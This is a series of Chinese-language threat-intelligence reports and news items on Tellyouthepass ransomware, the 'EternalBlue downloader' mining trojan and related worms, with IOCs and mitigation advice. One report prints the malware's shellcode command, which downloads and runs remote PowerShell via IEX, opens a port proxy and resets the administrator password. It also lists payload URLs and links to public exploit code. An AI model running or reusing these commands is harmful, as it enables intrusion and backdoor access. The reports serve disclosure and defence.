感谢腾讯御见威胁情报中心来稿！ 原文链接：https://mp.weixin.qq.com/s/DN93VBJprCrugxyIkEEHqg 一、概述 腾讯安全威胁情报中心在例行风险文件排查过程中，发现Tellyouthepass勒索病毒变种活跃。攻击者利用压缩工具打包exe的方式，将ms16-032内核提权漏洞利用模块、永恒之蓝内网扩散模块集成到勒索攻击包中，以实现内网蠕虫式病毒传播。若企业未及时修补漏洞，可能造成严重损失。 众所周知，WannaCry病毒事件就是勒索病毒利用永恒之蓝漏洞进行蠕虫化传播制造的网络灾难。只是幸运的是，永恒之蓝漏洞毕竟已经修补3年多了，未修复该漏洞的Windows系统只占少数。 查看Tellyouthepass勒索病毒用于交易的比特币钱包地址，发现近期已产生多笔交易，钱包当前余额0.69比特币。由于该勒索病毒使用了RSA+AES的方式对文件进行加密，被病毒加密后文件暂无法解密。同时具备蠕虫病毒攻击能力的勒索病毒极易在存在弱点的企业内网广泛传播，我们提醒各政企机构高度警惕。腾讯电脑管家、腾讯T-Sec终端安全管理系统均可查杀Tellyouthepass勒索病毒。 腾讯安全全系列安全产品针对Tellyouthepass勒索病毒的响应清单如下： 应用场景 安全产品 解决方案 威胁 情报 腾讯T-Sec 威胁情报云查服务 （SaaS） 1）Tellyouthepass勒索病毒相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics 腾讯T-Sec 高级威胁追溯系统 1）Tellyouthepass勒索相关信息和情报已支持检索。 网管可通过威胁追溯系统，分析日志，进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息，可参考：https://cloud.tencent.com/product/atts 云原生安全 防护 云防火墙 （Cloud Firewall，CFW） 基于网络流量进行威胁检测与主动拦截，已支持： 1）Tellyouthepass勒索网络相关联的IOCs已支持识别检测； 2）下发访问控制规则封禁目标端口，主动拦截永恒之蓝漏洞MS17-010相关访问流量。 有关云防火墙的更多信息，可参考：https://cloud.tencent.com/product/cfw 腾讯T-Sec  主机安全 （Cloud Workload Protection，CWP） 1）云镜已支持查杀Tellyouthepass相关联的传播利用模块，勒索模块； 2）云镜已支持永恒之蓝漏洞MS17-010的检测。 腾讯主机安全（云镜）提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息，可参考：https://cloud.tencent.com/product/cwp 腾讯T-Sec漏洞扫描服务 （Vulnerability Scan Service，VSS） 1）腾讯漏洞扫描服务已支持检测全网资产是否受永恒之蓝漏洞MS17-010影响； 2）已集成无损检测POC，企业可以对自身资产进行远程检测。 关于腾讯T-Sec漏洞扫描服务的更多信息，可参考：https://cloud.tencent.com/product/vss 腾讯T-Sec安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全（云镜）、腾讯御知等产品数据导入，为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息，可参考：https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 （腾讯御界） 基于网络流量进行威胁检测，已支持： 1）Tellyouthepass相关联的IOCs已支持识别检测； 2）已支持对利用永恒之蓝漏洞MS17-010协议特征进行识别检测。 关于T-Sec高级威胁检测系统的更多信息，可参考：https://cloud.tencent.com/product/nta 腾讯T-Sec终端安全管理系统（御点） 1）企业终端管理系统可查杀Tellyouthepass相关联的传播利用模块，勒索模块； 2）企业终端管理系统已支持检测黑产利用永恒之蓝漏洞MS17-010入侵相关的网络通信。 3）企业终端管理系统可对系统内高危漏洞进行一键修复 腾讯御点提供企业终端的防毒杀毒、防入侵、漏洞管理、基线管理等能力，关于T-Sec终端安全管理系统的更多资料，可参考：https://s.tencent.com/product/yd/index.html 更多产品信息，请参考腾讯安全官方网站https://s.tencent.com/ 二、样本分析 完整攻击利用包是一个使用压缩工具打包的exe执行程序，运行后会首先执行其包中的run_update.bat脚本。 run_update.bat脚本则进一步以awindows_privedge.exe作为父进程启动其它两模块 awindows_privedge.exe为ms16-032内核提权漏洞利用程序，攻击者试图以SYSTEM权限执行其它攻击模块，从而达到勒索加密文件覆盖面更广，内网扩散攻击过程更稳定的效果。 Lantools_exp.exe是一个Python打包的exe程序，解包反编译后可知该模块为针对smb进行攻击利用的工具集，其中包含了对smb服务的远程探测，smb登录psexec命令执行，端口扫描，http服务搭建等功能，同时该工具包含了永恒之蓝漏洞高危漏洞（MS17-010）的攻击利用，该模块运行后将进行内网蠕虫扩散debug.exe病毒模块。 病毒使用开源的永恒之蓝漏洞利用攻击相关代码 https://github.com/mez-0/MS17-010-Python/blob/master/zzz_exploit.py https://github.com/pythonone/MS17-010/blob/master/exploits/eternalblue debug.exe文件依然为使用压缩包打包的可执行程序，执行后首先运行debug.bat，脚本随后启动windebug.exe执行。 windebug.exe模块为go语言编写的Tellyouthepass勒索病毒，病毒运行后会首先生成RSA-1024本地密钥对。 随后使用硬编码的RSA-2048-PulbicKey对本地生成的RSA-1024-PrivateKey进行加密，并Base64编码保存作为勒索信中的personid部分内容。 硬编码RSA-2048 PublicKey信息 加密时对每个文件随机生成AES-KEY和IV，共计0x30字节 使用本地RSA-1024-Public-Key将AES-Key和IV加密后保存到文件头，共0x80字节数据。 最终对文件使用AES-CFB128模式进行全部加密 加密完成后文件均被添加.locked扩展后缀，同时留下名为README.html的勒索说明信件，勒索新提示要求使用BTC进行交易，查看其使用的钱包之一地址可知，近期已进行过7次交易，钱包内当前余额0.699比特币。 三、安全建议 根据该勒索病毒的特性，腾讯安全专家建议相关企业和个人用户参考以下建议强化网络抗攻击能力，修复高危漏洞，避免内网遭遇攻击而造成无法挽回的损失： 企业用户： 1、尽量关闭不必要的端口，如：445、135，139等，对3389，5900等端口可进行白名单配置，只允许白名单内的IP连接登陆。 2、尽量关闭不必要的文件共享，如有需要，请使用ACL和强密码保护来限制访问权限，禁用对共享文件夹的匿名访问。 3、采用高强度的密码，避免使用弱口令密码，并定期更换密码。建议服务器密码使用高强度且无规律密码，并且强制要求每个服务器使用不同密码管理。 4、对没有互联需求的服务器/工作站内部访问设置相应控制，避免可连外网服务器被攻击后作为跳板进一步攻击其他服务器。 5、对重要文件和数据（数据库等数据）进行定期非本地备份。 6、教育终端用户谨慎下载陌生邮件附件，若非必要，应禁止启用Office宏代码。 7、在终端/服务器部署专业安全防护软件，Web服务器可考虑部署在腾讯云等具备专业安全防护能力的云服务。 8、建议全网安装腾讯T-Sec终端安全管理系统（御点）（https://s.tencent.com/product/yd/index.html）。御点终端安全管理系统具备终端杀毒统一管控、修复漏洞统一管控，以及策略管控等全方位的安全管理功能，可帮助企业管理者全面了解、管理企业内网安全状况、保护企业安全。 个人用户： 1、启用腾讯电脑管家，勿随意打开陌生邮件，关闭Office执行宏代码； 2、使用腾讯电脑管家或Windows Update扫描修复系统漏洞； 3、启用腾讯电脑管家的文档守护者功能，利用磁盘冗余空间自动备份数据文档，即使发生意外，数据也可有备无患。 IOCs MD5 0a0d5d2d3c663c54a92cb11f7102eb39 4d087a11abc7ebd998ab1283676f7a97 08b94446162ed7a1a1b078d6ad5907f5 33aa4d88e79595b3a558ce205a331d43 62883c84dc55eb65fd713416957d8524 1992134d3f21def5de107f414b6b2067 cf89542ef0095543a46bb79f0e06fb3a fa3f30b22757cb0ce2148cbd3d1198dd    

感谢腾讯御见威胁情报中心来稿！ 原文链接：https://mp.weixin.qq.com/s/YXnmVzAFVD5fc6lQIFWE1A   一、背景 腾讯安全威胁情报中心检测到永恒之蓝下载器木马再次出现新变种，此次变种利用Python打包EXE可执行文件进行攻击，该组织曾在2018年底使用过类似手法。腾讯安全大数据监测数据显示，永恒之蓝下载器最新变种出现之后便迅速传播，目前已感染约1.5万台服务器，中毒系统最终用于下载运行门罗币挖矿木马。 永恒之蓝下载器木马在不断演进更新过程中，曾将EXE攻击方式逐步切换到利用Powershell脚本实现无文件攻击。在其功能越来越庞大之后，该黑产团伙再次将永恒之蓝漏洞攻击利用、mssql爆破攻击的代码重新添加到EXE木马中，并对Powershell中相关代码进行屏蔽。 被本次变种攻击失陷后的系统会下载if.bin、下载运行由随机字符串命名的EXE攻击模块进行大规模的漏洞扫描和攻击传播，同时会下载门罗币挖矿木马占用服务器大量CPU资源挖矿，会给受害企业造成严重生产力损失。 腾讯安全专家建议企业网管参考腾讯安全响应清单，对企业网络资产进行安全检测，以及时消除永恒之蓝下载器木马的破坏活动： 应用 场景 安全产品 解决方案 威 胁 情 报 腾讯T-Sec 威胁情报云查服务 （SaaS） 1）永恒之蓝下载器木马黑产团伙相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics 腾讯T-Sec 高级威胁追溯系统 1）永恒之蓝下载器木马黑产团伙相关信息和情报已支持检索。 网管可通过威胁追溯系统，分析日志，进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息，可参考：https://cloud.tencent.com/product/atts 云原生安全 防护 云防火墙 （Cloud Firewall，CFW） 基于网络流量进行威胁检测与主动拦截，已支持： 1）利用永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796相关联的IOCs已支持识别检测； 2）支持下发访问控制规则封禁目标端口，主动拦截永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796洞相关访问流量。 有关云防火墙的更多信息，可参考： https://cloud.tencent.com/product/cfw 腾讯T-Sec  主机安全 （Cloud Workload Protection，CWP） 1）云镜已支持永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796的检测； 2）已支持查杀利用永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796、Redis未授权访问漏洞入侵的挖矿木马、后门程序。 腾讯主机安全（云镜）提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息，可参考：https://cloud.tencent.com/product/cwp 腾讯T-Sec 漏洞扫描服务 （Vulnerability Scan Service，VSS） 1）腾讯漏洞扫描服务（VSS）已支持监测全网资产是否受永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796影响。 2）已集成无损检测POC，企业可以对自身资产进行远程检测。 关于腾讯T-Sec漏洞扫描服务的更多信息，可参考：https://cloud.tencent.com/product/vss 腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全（云镜）、腾讯御知等产品数据导入，为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息，可参考：https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 （腾讯御界） 基于网络流量进行威胁检测，已支持： 1）利用永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796相关联的IOCs已支持识别检测； 2）对利用永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796协议特征进行识别检测； 关于T-Sec高级威胁检测系统的更多信息，可参考： https://cloud.tencent.com/product/nta 腾讯T-Sec终端安全管理系统（御点） 1）可查杀永恒之蓝下载器木马团伙入侵释放的后门木马、挖矿木马程序； 2）企业终端管理系统已支持检测黑产利用永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796入侵相关的网络通信。 3）企业终端管理系统已支持检测利用Lnk漏洞CVE-2017-8464、Office漏洞CVE-2017-8570攻击的病毒程序； 腾讯御点提供企业终端的防毒杀毒、防入侵、漏洞管理、基线管理等能力，关于T-Sec终端安全管理系统的更多资料，可参考：https://s.tencent.com/product/yd/index.html 更多产品信息，请参考腾讯安全官方网站https://s.tencent.com/ 附：永恒之蓝下载器木马历次版本更新情况如下： 时间 主要功能更新 2018年12月14日 利用“驱动人生”系列软件升级通道下载，利用“永恒之蓝”漏洞攻击传播。 2018年12月19日 下载之后的木马新增Powershell后门安装。 2019年1月9日 检测到挖矿组件xmrig-32.mlz/xmrig-64.mlz下载。 2019年1月24日 木马将挖矿组件、升级后门组件分别安装为计划任务，并同时安装Powershell后门。 2019年1月25日 木马在1月24日的基础上再次更新，将攻击组件安装为计划任务，在攻击时新增利用mimikatz搜集登录密码，SMB弱口令爆破攻击，同时安装Powershell计划任务和hta计划任务。 2019年2月10日 将攻击模块打包方式改为Pyinstaller。 2019年2月20日 更新矿机组件，下载释放XMRig矿机，以独立进程启动挖矿。 2019年2月23日 攻击方法再次更新，新增MsSQL爆破攻击。 2019年2月25日 在2月23日基础上继续更新，更新MsSQL爆破攻击时密码字典，添加样本文件签名。至此攻击方法集成永恒之蓝漏洞攻击、SMB爆破攻击、MsSQL爆破攻击，同时使用黑客工具mimiktaz、psexec进行辅助攻击。 2019年3月6日 通过已感染机器后门更新Powershell脚本横向传播模块ipc。 2019年3月8日 通过已感染机器后门更新PE文件横向传播模块ii.exe，采用无文件攻击技术。该团伙使用的Powershell攻击代码与2018年9月发现的Mykings僵尸网络变种攻击代码有诸多相似之处。 2019年3月14日 通过后门更新增肥木马大小、生成随机文件MD5逃避查杀，将生成的大文件木马拷贝到多个系统目录并通过注册表启动项、开始菜单启动项、计划任务进自启动。 2019年3月28日 更新无文件攻击模块，更后新的攻击方式为：永恒之蓝漏洞攻击、弱口令爆破+WMIC、 Pass the hash+ SMBClient/SMBExec，并通过Payload安装计划任务将木马具有的多个恶意程序进行下载。 2019年4月3日 开创无文件挖矿新模式：挖矿脚本由PowerShell下载在内存中执行。 2019年7月19日 无文件攻击方法新增CVE-2017-8464 Lnk漏洞利用攻击，感染启动盘和网络共享盘，新增MsSQL爆破攻击。 2019年10月9日 新增Bluekeep漏洞CVE-2019-0708检测上报功能。 2020年2月12日 使用DGA域名，篡改hosts文件。 2020年4月3日 新增钓鱼邮件传播，邮件附件urgent.doc包含Office漏洞CVE-2017-8570。 2020年4月17日 钓鱼邮件新增附件readme.zip、readme.doc，新增Bypass UAC模块7p.php，创建readme.js文件感染可移动盘、网络共享盘 2020年5月21日 新增SMBGhost漏洞CVE-2020-0796检测上报功能，新增SSH爆破代码（未调用）。 2020年6月10日 新增SMBGhost漏洞CVE-2020-0796利用攻击，新增SSH爆破、Redis爆破攻击Linux服务器并植入Linux平台挖矿木马。 2020年6月24日 重新使用Python打包EXE攻击模块20.dat(C:\Windows\Temp\<random>.exe)，负责永恒之蓝漏洞攻击、$IPC、SMB、mssql爆破攻击，其他攻击方式仍然通过Powershell实现。 二、样本分析 永恒之蓝下载器木马在Powershell攻击代码中，将扫描445端口进行攻击的$IPC爆破和永恒之蓝漏洞利用攻击功能进行了屏蔽。但以下功能仍然保留： 1.“永恒之蓝”漏洞利用MS17-010 2.Lnk漏洞利用CVE-2017-8464 3.Office漏洞利用CVE-2017-8570 4.RDP爆破 5.感染可移动盘、网络磁盘 6.钓鱼邮件（使用新冠病毒疫情相关主题） 7.SMBGhost漏洞利用CVE-2020-0796 8.SSH爆破攻击Linux系统 9.Redis未授权访问漏洞攻击Linux系统 然后在攻击后执行的Payload中添加一行代码，负责下载和执行EXE攻击模块 http[:]//d.ackng.com/ode.bin。 Ode.bin是经过加密的Powershell代码，解密后的内容主要完成以下功能： 生成4到8位字符组成的随机字符串作为文件名<random>.exe； 从http[:]//167.71.87.85/20.dat下载文件保存至C:\Windows\Temp\<random>.exe； 如果符合权限则创建计划任务”\Microsoft\Windows\<random>.exe “每50分钟执行一次20.dat，如果不符合权限则创建C:\Windows\Temp\\tt.vbs，通过VBS脚本代码创建计划任务“<random>.exe “，同样每50分钟执行一次20.dat。 通过计划任务执行的20.dat（拷贝至C:\Windows\Temp\<random>.exe md5: ef3a4697773f84850fe1a086db8edfe0）实际上是由Python代码打包的扫描攻击模块，与永恒之蓝下载器病毒2018年底第一次出现时的攻击模块C:\WINDOWS\Temp\svvhost.exe相似（参考https://www.freebuf.com/news/192015.html）。 该病毒在后来的逐步发展过程中，逐步将攻击代码转移到了Powershell实现，并且利用计划任务来动态获取和启动，不会在磁盘上留下文件，也就是“无文件攻击”模式攻击。而此次病毒重新启动exe攻击模块，可能是因为其功能不断扩展，需要将一部分代码进行分割，切割后的攻击模块及功能如下图所示。 If.bin中的Powershell攻击代码与上个版本相同，此处不再分析，分割出的xxx.exe中解码出Python实现的永恒之蓝漏洞攻击代码如下，另外还会执行$IPC、SMB、mssql弱口令爆破攻击： 攻击成功后执行shellcode 1、 下载和执行Powershell代码gim.jsp； 2、 修改administrator账户登陆密码为k8d3j9SjfS7并激活administrator账户； 3、 添加防火墙规则允许65529端口访问并开启监听。 cmd.exe /c netsh.exe firewall add portopening tcp 65529 DNS&netsh interface portproxy add v4tov4 listenport=65529 connectaddress=1.1.1.1 connectport=53&powershell IEX(New-Object Net.WebClient).DownloadString(‘http[:]//t.amynx.com/gim.jsp’)&net user administrator k8d3j9SjfS7&net user administrator /active:yes gim.jsp是经过加密的Powershell代码，首先检测系统是否安装了以下杀软，如有调用卸载程序进行卸载： Eset、Kaspersky、avast、avp、Security、AntiVirus、Norton Security、Anti-Malware 然后安装一个计划任务“blackball”和一个随机名计划任务，定期下载和执行a.jsp（a.jsp继续下载和执行挖矿和攻击模块）。 IOCs Domain info.zz3r0.com info.amynx.com w.zz3r0.com IP 167.71.87.85 URL http[:]//167.71.87.85/20.dat http[:]//d.ackng.com/ode.bin http[:]//d.ackng.com/if.bin http[:]//t.amynx.com/gim.jsp http[:]//t.amynx.com/smgho.jsp http[:]//t.amynx.com/a.jsp md5 C:\Windows\Temp\<random>.exe ef3a4697773f84850fe1a086db8edfe0 8ec20f2cbad3103697a63d4444e5c062 ac48b1ea656b7f48c34e66d8e8d84537 d61d88b99c628179fa7cf9f2a310b4fb f944742b01606605a55c1d55c469f0c9 abd6f640423a9bf018853a2b40111f76 57812bde13f512f918a0096ad3e38a07 d8e643c74996bf3c88325067a8fc9d78 125a6199fd32fafec11f812358e814f2 fb880dc73e4db0a43be8a68ea443bfe1 8d46dbe92242a4fde2ea29cc277cca3f 48fbe4b6c9a8efc11f256bda33f03460 gim.jsp 98f48f31006be66a8e07b0ab189b6d02 a.jsp 6bb4e93d29e8b78e51565342b929c824 ode.bin e009720bd4ba5a83c4b0080eb3aea1fb if.bin 092478f1e16cbddb48afc3eecaf6be68 smgho.jsp ca717602f0700faba6d2fe014c9e6a8c 参考链接： 《“黑球”行动再升级，SMBGhost漏洞攻击进入实战》 https://mp.weixin.qq.com/s/ZoiKCTEaxhXIXsI4OzhWvA

感谢腾讯御见威胁情报中心来稿！ 原文：https://s.tencent.com/research/report/823.html   近日，腾讯安全御见威胁情报中心监测发现，“永恒之蓝下载器”木马再次更新，新增了BlueKeep漏洞CVE-2019-0708检测利用功能，影响Windows 7、XP、Server 2003、2008等多个系统版本。鉴于该漏洞危害影响极大，可形成类似WannaCry蠕虫式漏洞传播，腾讯安全建议企业用户及时安装相关补丁，并启用安全软件防御攻击，避免进一步造成重大安全事故。 据腾讯安全技术专家介绍，更新后的永恒之蓝下载器木马保留了MS17-010永恒之蓝漏洞攻击、SMB爆破攻击、sql爆破攻击等功能，并在攻击成功的目标机器上植入旧的攻击模块ipc.jsp，同时安装计划任务执行多个Powershell后门，下载执行新的攻击模块if.bin，为后续随时发动攻击做足准备。 （图：永恒之蓝下载器木马变种攻击流程图） 值得一提的是，CVE-2019-0708为RDP远程代码执行漏洞，该漏洞无需身份认证和用户交互，检测利用功能目前仅是上报漏洞信息并不会采取进一步攻击措施。截止目前，永恒之蓝相关漏洞未修复的比例接近30%，而BlueKeep漏洞未修复的比例接近20%，惊人的数据背后给用户网络安全带来巨大安全隐患。 自诞生以来，频繁更新的永恒之蓝下载器木马令广大用户提心吊胆。在去年2018年底，永恒之蓝下载器木马首次通过“驱动人生”系列软件升级通道突然爆发传播，利用“永恒之蓝”高危漏洞在企业内网呈蠕虫式传播，并通过云控下发恶意代码，仅2个小时受攻击用户便高达10万。所幸该攻击刚开始便被腾讯安全御见威胁情报中心率先拦截查杀,影响并未进一步扩大。此后不到一年的时间内，永恒之蓝下载器木马先后更新Powershell后门安装、SMB爆破攻击、MsSQL爆破攻击，同时使用黑客工具mimiktaz、psexec进行辅助攻击等20多个版本。不同以往，此次永恒之蓝下载器木马新增了BlueKeep漏洞检测代码，不排除攻击者随时启动BlueKeep漏洞进行攻击的可能。 （图：永恒之蓝下载器木马历史变种版本回顾） 针对该木马病毒对企业网络安全带来的潜在威胁，腾讯安全反病毒实验室负责人马劲松提醒广大企业用户，建议参考微软官方公告完成补丁安装，可暂时关闭135、139、445等不必要的服务器端口；使用腾讯御点终端安全管理系统的漏洞修复功能，及时修复系统高危漏洞；服务器使用高强度密码，切勿使用弱口令，防止黑客暴力破解；推荐部署腾讯御界高级威胁检测系统检测可能的黑客攻击。该系统可高效检测未知威胁，并通过对企业内外网边界处网络流量的分析，感知漏洞的利用和攻击。 （图：腾讯御界高级威胁检测系统）

外媒 3 月 12 日消息，来自 ISC SANS 组织和安全公司 Imperva 的研究人员发现了两个针对 Windows Server、Redis 以及 Apache Solr 服务器的恶意活动 — 攻击者试图针对这些未打补丁的服务器安装加密货币矿工。 第一个活动被称为 RedisWannaMine，主要针对的目标对象是 Redis 和 Windows Server 服务器。研究人员发现攻击者通过大规模的网络扫描来寻找运行过时 Redis 版本的系统，以触发 CVE-2017-9805 漏洞。 研究人员观察到，RedisWannaMine 通过执行脚本来下载一个公共可用的工具 masscan ，在将其存储到 Github 存储库后，编译并安装它。一旦获得访问主机的权限，攻击者将放弃 ReddisWannaMine 恶意软件作为第一阶段 playload，并安装第二阶段的加密货币矿工。 RedisWannaMine 通过 EternalBlue （永恒之蓝）进行传播，并且具有类似蠕虫的行为， 但它在逃避技术和功能方面更为复杂：RedisWannaMine 结合先进的攻击手段来增加感染率，从而获取更大的利益。除此之外，ReddisWannaMine 活动也显示了其自传播蠕虫的经典行为模式。 第二次采矿活动是通过利用 CVE-2017-12629 漏洞攻击 Apache Solr 服务器。根据 ISC SANS 发布的分析报告，在 2 月 28 日至 3 月 8 日这段时间内，这场活动共感染了 1777 个服务器， 其中有 1416个 是 Apache Solr。 研究人员认为这两项活动都只是冰山一角，未来还会出现越来越多针对加密货币行业的攻击事件。 消息来源：Security Affairs，编译：榆榆，校审：FOX; 本文由 HackerNews.cc 编译整理，封面来源于网络； 转载请注明“ 转自 HackerNews.cc ” 并附上原文链接。

外媒 2 月1 日报道，安全公司 CrowdStrike 发现了一款名为 WannaMine 的新型 Monero 加密挖掘蠕虫，其利用与 NSA 相关的 EternalBlue （“ 永恒之蓝 ” ）漏洞进行传播。据研究人员测试，WannaMine 能够感染从 Windows 2000 起的所有 Windows 系统（包括 64 位版本和 Windows Server 2003），并使其设备性能明显下降。 CrowdStrike 称目前一些矿业的日常运营已受到 WannaMine 影响，比如由于如此高的 CPU 利用率，导致矿业公司的系统以及应用程序崩溃。 研究人员经过分析后发现 WannaMine 的恶意代码十分复杂，因为它实现了一种类似于国家赞助的 APT 组织所使用的扩散机制和持久性模型。更详细地解释是：WannaMine 利用 Windows 管理工具( WMI )永久事件订阅来在受感染的系统上获得持久性。当注册一个永久事件订阅后，WannaMine 将在事件使用者中每 90 分钟执行一个 PowerShell 命令。 研究人员注意到，WannaMine 使用凭证收割机 Mimikatz 来收集用户凭据，从而达到横向移动的目的，但如果不能够横向移动的话，WannaMine 将更依赖于 EternalBlue 的利用。 相关报告： <Threat Hunting, the Investigation of Fileless Malware Attacks> 消息来源：Security Affairs，编译：榆榆，校审：FOX; 本文由 HackerNews.cc 编译整理，封面来源于网络； 转载请注明“ 转自 HackerNews.cc ” 并附上原文链接。

据外媒 8 月 21 日报道，趋势科技（ Trend Micro ）研究人员近期发现加密货币勒索软件 Miner，允许黑客利用 Windows 管理工具 WMI 与安全漏洞 “ 永恒之蓝（EternalBlue）” 进行肆意传播。据悉，该勒索软件首次于今年 7 月发现，受其影响最严重的国家包括日本（43.05%）、印度尼西亚（21.36%）、台湾（13.67%）、泰国（10.07%）等。 图1. 2017 年 7 月至 8 月感染勒索软件 Miner 分布情况 研究人员表示，该勒索软件使用 WMI 作为无文件持久性机制，即由 WMI Standard Event Consumer 脚本应用程序（scrcons.exe）执行。此外，Miner 还使用 EternalBlue 漏洞感染系统网络。研究显示，无文件 WMI 脚本与 EternalBlue 的结合可以使 Miner 隐蔽持久的感染目标设备。 Miner 的感染流程分为多个阶段。首先，Miner 感染目标系统后会通过 EternalBlue 漏洞删除并运行系统后门（BKDR_FORSHARE.A）；其次，系统在安装各种 WMI 脚本后，会将其连接到 C＆C 服务器并获取指令；最终，目标系统将下载运行该恶意软件与其相关组件进行肆意传播。 图2. 感染流程 目前，安全专家提醒各机构 IT 管理员限制或禁用 WMI 管理工具、仅授予对需要访问 WMI 的特定管理员以降低 WMI 攻击风险。此外，管理员也可选择禁用 SMBv1 以减少设备进一步受到危害。 附：趋势科技原文报告《 Cryptocurrency Miner Uses WMI and EternalBlue To Spread Filelessly 》 原作者：Pierluigi Paganini，译者：青楚 本文由 HackerNews.cc 翻译整理，封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接。